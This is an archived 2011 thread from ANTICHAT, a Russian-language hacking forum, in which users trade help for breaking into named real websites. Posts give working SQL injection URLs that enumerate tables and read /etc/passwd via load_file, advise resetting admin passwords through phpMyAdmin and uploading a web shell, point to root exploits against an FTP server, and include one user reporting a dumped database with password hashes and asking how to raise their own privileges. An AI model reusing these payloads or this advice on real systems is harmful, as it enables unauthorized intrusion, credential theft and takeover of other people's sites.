ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.05.2011, 16:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от winstrool
winstrool said:
@@version_compile_os=Win32
@@version=5.0.18-nt
есть точный путь до корневого католога сайта, .htaccess не мешает, пхп выполняется, а мой не хочет, даже элементарный phpinfo();
знач мускул на винде, там какой сервак, апач/iis или что?
если апач то попробуй узнать ос по баннерам
вобщем если ты рут и есть PMA, то ищи там в базах всякие cms ки или форумы, меняй пасс админа, или добавь нового, и залей шелл
быстрый и эффективный метод
|
|
|
30.05.2011, 20:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
2504
Репутация:
0
|
|
http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10+from+information_schema.tables+wher e+table_schema=0x616d656c69615f74657374 +--+
НЕ получается вывести таблицы имя базы amelia_test
|
|
|
|
30.05.2011, 21:13
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от kartes1984
kartes1984 said:
http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10+from+information_schema.tables+wher e+table_schema=0x616d656c69615f74657374 +--+
НЕ получается вывести таблицы имя базы amelia_test
В ней нет нечего
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,count(*),7,8,9,10+from+i nformation_schema.tables+where+table_schema=0x616d 656c69615f74657374+--+
0
|
|
|
|
30.05.2011, 22:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
2504
Репутация:
0
|
|
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+-+
opi8-база
omokage@localhos-пользователь
Как проверить есть ли у пользователя файловые привелегии?
|
|
|
|
30.05.2011, 22:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
вернул ноль:
Код:
Code:
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10--+
|
|
|
|
31.05.2011, 00:30
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
на нужном сайте нашёл фтп доступ
шарясь по папкам и файлам конфига не нащёл.
шелл через браузер не залить
вот такой вопрос
а можно подключиться к этому же фтп через тотал команд или любой другой фтп софт
фтп вероятна без пароля? коль позволяет заходить через браузер и осматриваться
не в том направлении мыслю?
|
|
|
|
31.05.2011, 00:46
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Koren
зайти можно юзая любой фтп клиент, например filezilla
но это аккаунт анонимус, врятли будут права для заливки файлов
если серв на *Nix-e, то смотри в сторону рут сплоитов под данную фтпшку
|
|
|
|
31.05.2011, 04:09
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Код:
Code:
Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
« Error »
Etomite encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
PHP error debug
Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)
Error type/ Nr.: Warning - 2
File: /home/infosno/public_html/index.php
Line: 394
Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']);
Parser timing
MySQL: 0.0000 s s (0 Requests)
PHP: 0.6546 s s
Total: 0.6546 s s
Можно использовать эту ошибку как уязвимость? если да то можно пример... |
|
|
|
31.05.2011, 04:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
Код:
Code:
Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
« Error »
Etomite encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
PHP error debug
Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)
Error type/ Nr.: Warning - 2
File: /home/infosno/public_html/index.php
Line: 394
Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']);
Parser timing
MySQL: 0.0000 s s (0 Requests)
PHP: 0.6546 s s
Total: 0.6546 s s
Можно использовать эту ошибку как уязвимость? если да то можно пример... Сайт вам сообщает, что не может вывести заголовки, поскольку они уже были выведены. Конечно там может что то есть, но из этой ошибки можно получить только раскрытие путей. Если переменные, преступаемые в header не фильтруются, то вполне возможно получить XSS.
|
|
|
|
31.05.2011, 17:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
42706
Репутация:
6
|
|
Анализировал сайт через Webcruiser тот обнаружил пару уязвимостей,провел sql атаку и тут выдало всю Бд и Информацию о сервере,слил все аккаунты и хеши с паролями. Мне нужно повысить права доступа на своем аккаунте на том сайте,можно ли как нибуть редактировать БД? Mysql-5
Выглядит уязвимость так
Код:
Code:
_http://wow-hummer.com/account/index.php?modul=static&id=5
Кейворд: Игрового |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
